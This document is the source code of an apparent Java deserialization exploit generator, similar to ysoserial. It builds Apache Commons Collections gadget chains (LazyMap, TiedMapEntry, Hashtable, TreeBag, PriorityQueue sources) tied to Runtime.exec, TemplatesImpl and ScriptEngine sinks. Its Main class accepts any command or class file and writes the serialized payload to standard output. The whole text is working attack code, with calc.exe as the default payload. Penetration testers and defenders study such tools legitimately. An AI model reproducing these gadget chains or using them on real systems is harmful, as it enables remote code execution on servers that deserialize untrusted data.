90 | TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, tpl);
91 |
92 | HashMap obj = new HashMap();
93 | obj.put(tiedMapEntry, "t");
94 | innerMap.clear();
95 |
96 | Reflections.setFieldValue(outerMap, "factory", result.transformer4);
97 |
98 | return obj;
99 | }
100 |
101 | public static HashSet HashSetSource(SinkResult result) throws Exception {
102 | Transformer fakeTransformers = generateFakeTransformers();
103 |
104 | Map innerMap = new HashMap();
105 | Map outerMap = LazyMap.lazyMap(innerMap, fakeTransformers);
106 | Object tpl = 1;
107 | if (result.templates != null) {
108 | tpl = result.templates;
109 | }
110 |
111 | TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, tpl);
112 |
113 | HashMap hashMap = new HashMap();
114 | hashMap.put(tiedMapEntry, "t");
115 | HashSet obj = new HashSet(hashMap.keySet());
116 | outerMap.clear();
117 |
118 | Reflections.setFieldValue(outerMap, "factory", result.transformer4);
119 |
120 | return obj;
121 | }
122 |
123 | public static Hashtable HashtableSource(SinkResult result) throws Exception {
124 | Transformer fakeTransformers = generateFakeTransformers();
125 |
126 | Map innerMap1 = new HashMap();
127 | Map innerMap2 = new HashMap();
128 | Object tpl = 1;
129 | if (result.templates != null) {
130 | tpl = result.templates;
131 | }
132 |
133 | Map lazyMap1 = LazyMap.lazyMap(innerMap1, fakeTransformers);
134 | lazyMap1.put("yy", tpl);
135 |
136 | Map lazyMap2 = LazyMap.lazyMap(innerMap2, fakeTransformers);
137 | lazyMap2.put("zZ", tpl);
138 |
139 | Hashtable obj = new Hashtable();
140 | obj.put(lazyMap1, tpl);
141 | obj.put(lazyMap2, tpl);
142 | lazyMap2.remove("yy");
143 |
144 | try {
145 | Object resultTransformers = Reflections.getFieldValue(result.transformer4, "iTransformers");
146 | Reflections.setFieldValue(fakeTransformers, "iTransformers", resultTransformers);
147 | } catch (NullPointerException e) {
148 | Reflections.setFieldValue(lazyMap1, "factory", result.transformer4);
149 | Reflections.setFieldValue(lazyMap2, "factory", result.transformer4);
150 | }
151 |
152 | return obj;
153 | }
154 |
155 | public static TreeBag TreeBagSource(SinkResult result) throws Exception {
156 | Transformer fakeTransformers = generateFakeTransformers();
157 |
158 | TransformingComparator comp = new TransformingComparator(fakeTransformers);
159 | TreeBag obj = new TreeBag(comp);
160 | Object tpl = 1;
161 | if (result.templates != null) {
162 | tpl = result.templates;
163 | }
164 | obj.add(tpl);
165 |
166 | Reflections.setFieldValue(comp, "transformer", result.transformer4);
167 |
168 | return obj;
169 | }
170 |
171 | private static Transformer generateFakeTransformers() {
172 | return new ChainedTransformer(new Transformer[]{new ConstantTransformer(0)});
173 | }
174 |
175 |
176 | }
177 |
--------------------------------------------------------------------------------
/src/main/java/GGC.java:
--------------------------------------------------------------------------------
1 | public class GGC {
2 |
3 | // public static Object CCC1() throws Exception {
4 | // return Source4.TreeBagSource(Sink4.TemplatesImplNewTransformerSink(DefaultConfig.code));
5 | // }
6 |
7 | @SinkTypeAnnotation(type = "command")
8 | public static Object CC1(String command) throws Exception {
9 | return Source3.AnnotationInvocationHandlerSource(Sink3.RuntimeExecSink(command));
10 | }
11 |
12 | @SinkTypeAnnotation(type = "command")
13 | public static Object CCH1(String command) throws Exception {
14 | return Source4.AnnotationInvocationHandlerSource(Sink4.RuntimeExecSink(command));
15 | }
16 |
17 | @SinkTypeAnnotation(type = "code")
18 | public static Object CC2(Object code) throws Exception {
19 | return Source4.PriorityQueueSource(Sink4.TemplatesImplNewTransformerSink(code));
20 | }
21 |
22 | @SinkTypeAnnotation(type = "code")
23 | public static Object CC3(Object code) throws Exception {
24 | return Source3.AnnotationInvocationHandlerSource(Sink3.TemplatesImplTrAXFilterSink(code));
25 | }
26 |
27 | @SinkTypeAnnotation(type = "code")
28 | public static Object CCH3(Object code) throws Exception {
29 | return Source4.AnnotationInvocationHandlerSource(Sink4.TemplatesImplTrAXFilterSink(code));
30 | }
31 |
32 | @SinkTypeAnnotation(type = "code")
33 | public static Object CC4(Object code) throws Exception {
34 | return Source4.PriorityQueueSource(Sink4.TemplatesImplTrAXFilterSink(code));
35 | }
36 |
37 | @SinkTypeAnnotation(type = "command")
38 | public static Object CC5(String command) throws Exception {
39 | return Source3.BadAttributeValueExpExceptionSource(Sink3.RuntimeExecSink(command));
40 | }
41 |
42 | @SinkTypeAnnotation(type = "command")
43 | public static Object CCH5(String command) throws Exception {
44 | return Source4.BadAttributeValueExpExceptionSource(Sink4.RuntimeExecSink(command));
45 | }
46 |
47 | @SinkTypeAnnotation(type = "command")
48 | public static Object CC6(String command) throws Exception {
49 | return Source3.HashMapSource(Sink3.RuntimeExecSink(command));
50 | }
51 |
52 | @SinkTypeAnnotation(type = "command")
53 | public static Object CCH6(String command) throws Exception {
54 | return Source4.HashMapSource(Sink4.RuntimeExecSink(command));
55 | }
56 |
57 | @SinkTypeAnnotation(type = "command")
58 | public static Object CC7(String command) throws Exception {
59 | return Source3.HashtableSource(Sink3.RuntimeExecSink(command));
60 | }
61 |
62 | @SinkTypeAnnotation(type = "command")
63 | public static Object CCH7(String command) throws Exception {
64 | return Source4.HashtableSource(Sink4.RuntimeExecSink(command));
65 | }
66 |
67 | @SinkTypeAnnotation(type = "code")
68 | public static Object CC8(Object code) throws Exception {
69 | return Source3.HashSetSource(Sink3.TemplatesImplNewTransformerSink(code));
70 | }
71 |
72 | @SinkTypeAnnotation(type = "code")
73 | public static Object CCH8(Object code) throws Exception {
74 | return Source4.HashSetSource(Sink4.TemplatesImplNewTransformerSink(code));
75 | }
76 |
77 | @SinkTypeAnnotation(type = "command")
78 | public static Object CC10(String command) throws Exception {
79 | return Source3.HashtableSource(Sink3.RuntimeExecSink(command));
80 | }
81 |
82 | @SinkTypeAnnotation(type = "command")
83 | public static Object CCH10(String command) throws Exception {
84 | return Source4.HashtableSource(Sink4.RuntimeExecSink(command));
85 | }
86 |
87 | @SinkTypeAnnotation(type = "code")
88 | public static Object CC11(Object code) throws Exception {
89 | return Source3.HashSetSource(Sink3.TemplatesImplNewTransformerSink(code));
90 | }
91 |
92 | @SinkTypeAnnotation(type = "code")
93 | public static Object CCH11(Object code) throws Exception {
94 | return Source4.HashSetSource(Sink4.TemplatesImplNewTransformerSink(code));
95 | }
96 |
97 | @SinkTypeAnnotation(type = "code")
98 | public static Object CC12(Object code) throws Exception {
99 | return Source3.HashMapSource(Sink3.ScriptEngineManagerSink(code));
100 | }
101 |
102 | @SinkTypeAnnotation(type = "code")
103 | public static Object CCH12(Object code) throws Exception {
104 | return Source4.HashMapSource(Sink4.ScriptEngineManagerSink(code));
105 | }
106 |
107 | @SinkTypeAnnotation(type = "code")
108 | public static Object CCK1(Object code) throws Exception {
109 | return Source3.HashMapSource(Sink3.TemplatesImplNewTransformerSink(code));
110 | }
111 |
112 | @SinkTypeAnnotation(type = "code")
113 | public static Object CCK2(Object code) throws Exception {
114 | return Source4.HashMapSource(Sink4.TemplatesImplNewTransformerSink(code));
115 | }
116 |
117 | @SinkTypeAnnotation(type = "command")
118 | public static Object CCK3(String command) throws Exception {
119 | return Source3.HashMapSource(Sink3.RuntimeExecSink(command));
120 | }
121 |
122 | @SinkTypeAnnotation(type = "command")
123 | public static Object CCK4(String command) throws Exception {
124 | return Source4.HashMapSource(Sink4.RuntimeExecSink(command));
125 | }
126 |
127 |
128 | public static Object CC1() throws Exception {
129 | return CC1(DefaultConfig.command);
130 | }
131 |
132 | public static Object CC2() throws Exception {
133 | return CC2(DefaultConfig.code);
134 | }
135 |
136 | public static Object CC3() throws Exception {
137 | return CC3(DefaultConfig.code);
138 | }
139 |
140 | public static Object CC4() throws Exception {
141 | return CC4(DefaultConfig.code);
142 | }
143 |
144 | public static Object CC5() throws Exception {
145 | return CC5(DefaultConfig.command);
146 | }
147 |
148 | public static Object CC6() throws Exception {
149 | return CC6(DefaultConfig.command);
150 | }
151 |
152 | public static Object CC7() throws Exception {
153 | return CC7(DefaultConfig.command);
154 | }
155 |
156 | public static Object CCK1() throws Exception {
157 | return CCK1(DefaultConfig.code);
158 | }
159 |
160 | public static Object CCK2() throws Exception {
161 | return CCK2(DefaultConfig.code);
162 | }
163 |
164 | public static Object CCK3() throws Exception {
165 | return CCK3(DefaultConfig.command);
166 | }
167 |
168 | public static Object CCK4() throws Exception {
169 | return CCK4(DefaultConfig.command);
170 | }
171 |
172 | public static Object CC8() throws Exception {
173 | return CC8(DefaultConfig.code);
174 | }
175 |
176 | public static Object CC10() throws Exception {
177 | return CC10(DefaultConfig.command);
178 | }
179 |
180 | public static Object CC11() throws Exception {
181 | return CC11(DefaultConfig.code);
182 | }
183 |
184 | public static Object CC12() throws Exception {
185 | return CC12(DefaultConfig.code);
186 | }
187 |
188 | public static Object CCH1() throws Exception {
189 | return CCH1(DefaultConfig.command);
190 | }
191 |
192 | public static Object CCH3() throws Exception {
193 | return CCH3(DefaultConfig.code);
194 | }
195 |
196 | public static Object CCH5() throws Exception {
197 | return CCH5(DefaultConfig.command);
198 | }
199 |
200 | public static Object CCH6() throws Exception {
201 | return CCH6(DefaultConfig.command);
202 | }
203 |
204 | public static Object CCH7() throws Exception {
205 | return CCH7(DefaultConfig.command);
206 | }
207 |
208 | public static Object CCH8() throws Exception {
209 | return CCH8(DefaultConfig.code);
210 | }
211 |
212 | public static Object CCH10() throws Exception {
213 | return CCH10(DefaultConfig.command);
214 | }
215 |
216 | public static Object CCH11() throws Exception {
217 | return CCH11(DefaultConfig.code);
218 | }
219 |
220 | public static Object CCH12() throws Exception {
221 | return CCH12(DefaultConfig.code);
222 | }
223 | }
224 |
--------------------------------------------------------------------------------
/src/main/java/Main.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 | import java.lang.reflect.Method;
3 | import java.util.List;
4 | import java.util.Map;
5 |
6 | public class Main {
7 | static List sourceMethodList;
8 | static List sinkMethodList;
9 | static List GGCMethodList;
10 |
11 | public static void usage() {
12 | String s = "Usage: javaGGC version=(3/4) [source=SOURCE_INDEX] [sink=SINK_INDEX] [arg=(command/code/schema, please see below for more information)] [test_on_local=(anyValue means yes)]\n"+
13 | " |\n"+
14 | " javaGGC 0 [ggc=CC_INDEX/CC_NAME] [arg=(command/code/schema, please see below for more information)] [test_on_local=(anyValue means yes)]\n" +
15 | "\n" +
16 | " arg: 1 means run calc.exe and allow schema:" +
17 | " file:// read contents as arg from file" +
18 | " class:// read class bytes as args from class file";
19 | System.out.println(s);
20 | }
21 |
22 | private static void help() {
23 | usage();
24 |
25 | String s = "Generate commons.collections gadget chain.\n" +
26 | " Default command / code is opening calc.exe.\n" +
27 | " Set a version 0 or 3 or 4 for more information.\n";
28 | System.out.println(s);
29 | System.exit(1);
30 | }
31 |
32 | private static void usageGGC() {
33 | usage();
34 | String name;
35 | Method method;
36 |
37 | System.out.println("Available GGC:");
38 | for (int i = 0; i < GGCMethodList.size(); i++) {
39 | method = GGCMethodList.get(i);
40 | name = method.getName();
41 | if (!name.startsWith("CC")) {
42 | continue;
43 | }
44 | name = AppendGGCComment(name, method);
45 |
46 | System.out.println(" [" + i + "] " + name);
47 | }
48 | System.exit(2);
49 | }
50 |
51 | private static void usageListSourceAndSink() {
52 | usage();
53 |
54 | String name;
55 | System.out.println("Available Source:");
56 | for (int i = 0; i < sourceMethodList.size(); i++) {
57 | name = sourceMethodList.get(i).getName();
58 | if (!name.endsWith("Source")) {
59 | continue;
60 | }
61 | name = AppendSourceComment(name);
62 | System.out.println(" [" + i + "] " + name);
63 | }
64 | System.out.println("Available Sink:");
65 | for (int i = 0; i < sinkMethodList.size(); i++) {
66 | name = sinkMethodList.get(i).getName();
67 | if (!name.endsWith("Sink")) {
68 | continue;
69 | }
70 | name = AppendSinkComment(name);
71 |
72 | System.out.println(" [" + i + "] " + name);
73 | }
74 | System.exit(2);
75 | }
76 |
77 | private static Object DealWithArg(String arg, boolean IsSinkExec) {
78 | Object result = null;
79 |
80 | if (arg.equals("1")) {
81 | if (IsSinkExec) {
82 | result = DefaultConfig.command;
83 | } else {
84 | result = DefaultConfig.code;
85 | }
86 | } else if (arg.startsWith("file://")) {
87 | arg = arg.substring(7);
88 | try {
89 | result = Utils.readFiletoString(arg);
90 | } catch (IOException e) {
91 | e.printStackTrace();
92 | System.exit(3);
93 | }
94 | } else if (arg.startsWith("class://")) {
95 | arg = arg.substring(8);
96 | try {
97 | result = Utils.readFileToBytes(arg);
98 | } catch (IOException e) {
99 | e.printStackTrace();
100 | System.exit(3);
101 | }
102 | } else {
103 | result = arg;
104 | }
105 |
106 | return result;
107 | }
108 |
109 |
110 |
111 | private static String AppendGGCComment(String name, Method method) {
112 | if (method.isAnnotationPresent(SinkTypeAnnotation.class)) {
113 | SinkTypeAnnotation sta = method.getAnnotation(SinkTypeAnnotation.class);
114 | name += " (" + sta.type() + ")";
115 | }
116 | return name;
117 | }
118 |
119 | private static String AppendSourceComment(String name) {
120 | if (name.contains("AnnotationInvocationHandler")) {
121 | name += " (jdk<8u71)";
122 | }
123 | return name;
124 | }
125 |
126 | private static String AppendSinkComment(String name) {
127 | if (name.contains("RuntimeExec")) {
128 | name += " (command)";
129 | } else {
130 | name += " (code)";
131 | }
132 | return name;
133 | }
134 |
135 | public static void main(String[] args) throws Exception {
136 | Integer version = -1;
137 | Integer SourceIndex = -1;
138 | Integer SinkIndex = -1;
139 | Integer GGCIndex = -1;
140 | String arg = "";
141 | Object objArg = null;
142 | Object obj = null;
143 | boolean isSinkExec = false;
144 |
145 | if (args.length < 1) {
146 | help();
147 | }
148 | try {
149 | version = Integer.parseInt(args[0]);
150 | } catch (NumberFormatException e) {
151 | help();
152 | }
153 | if (version == 3 || version == 4) {
154 | if (version == 3) {
155 | sourceMethodList = Reflections.getClassMethods(Source3.class);
156 | sinkMethodList = Reflections.getClassMethods(Sink3.class);
157 | } else {
158 | sourceMethodList = Reflections.getClassMethods(Source4.class);
159 | sinkMethodList = Reflections.getClassMethods(Sink4.class);
160 | }
161 |
162 | if (args.length < 4) {
163 | usageListSourceAndSink();
164 | }
165 |
166 | try {
167 | SourceIndex = Integer.parseInt(args[1]);
168 | } catch (NumberFormatException e) {
169 | System.out.println("IllegalArgumentException: source must be Integer");
170 | help();
171 | }
172 |
173 | try {
174 | SinkIndex = Integer.parseInt(args[2]);
175 | } catch (NumberFormatException e) {
176 | System.out.println("IllegalArgumentException: sink must be Integer");
177 | help();
178 | }
179 |
180 |
181 | Method SourceMethod = sourceMethodList.get(SourceIndex);
182 | Method SinkMethod = sinkMethodList.get(SinkIndex);
183 |
184 | if (SinkMethod.getName().contains("RuntimeExec")) {
185 | isSinkExec = true;
186 | }
187 | objArg = DealWithArg(args[3], isSinkExec);
188 |
189 | SinkResult sinkResult = (SinkResult) SinkMethod.invoke(null, objArg);
190 | obj = SourceMethod.invoke(null, sinkResult);
191 |
192 | } else if (version == 0) {
193 | Method GGCMethod = null;
194 | GGCMethodList = Reflections.getClassMethods(GGC.class);
195 | if (args.length < 3) {
196 | usageGGC();
197 | }
198 | try {
199 | GGCIndex = Integer.parseInt(args[1]);
200 | GGCMethod = GGCMethodList.get(GGCIndex);
201 | } catch (NumberFormatException e) {
202 | String GGCName = args[1];
203 | for (Method m : GGCMethodList) {
204 | if (m.getName().equals(GGCName)) {
205 | GGCMethod = m;
206 | break;
207 | }
208 | }
209 | if (GGCMethod == null) {
210 | System.out.println("Exception: can't find this ggc");
211 | System.exit(4);
212 | }
213 | }
214 |
215 | if (GGCMethod.isAnnotationPresent(SinkTypeAnnotation.class)) {
216 | SinkTypeAnnotation sta = GGCMethod.getAnnotation(SinkTypeAnnotation.class);
217 | if (sta.type().equals("command")) {
218 | isSinkExec = true;
219 | }
220 | }
221 | objArg = DealWithArg(args[2], isSinkExec);
222 | obj = GGCMethod.invoke(null, objArg);
223 | } else {
224 | System.out.println("IllegalArgumentException: version must be 0 or 3 or 4");
225 | help();
226 | }
227 |
228 | if (obj == null) {
229 | System.out.println("Exception: obj is null");
230 | System.exit(5);
231 | }
232 |
233 | ByteArrayOutputStream barr = new ByteArrayOutputStream();
234 | ObjectOutputStream oos = new ObjectOutputStream(barr);
235 | oos.writeObject(obj);
236 | oos.close();
237 | ObjectOutputStream objOut = new ObjectOutputStream(System.out);
238 | objOut.writeObject(obj);
239 |
240 | if ((version == 0 && args.length == 4) || args.length == 5) {
241 | try {
242 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
243 | ois.readObject();
244 | } catch (Exception e) {
245 | e.printStackTrace();
246 | }
247 | }
248 |
249 | }
250 | }
251 |
--------------------------------------------------------------------------------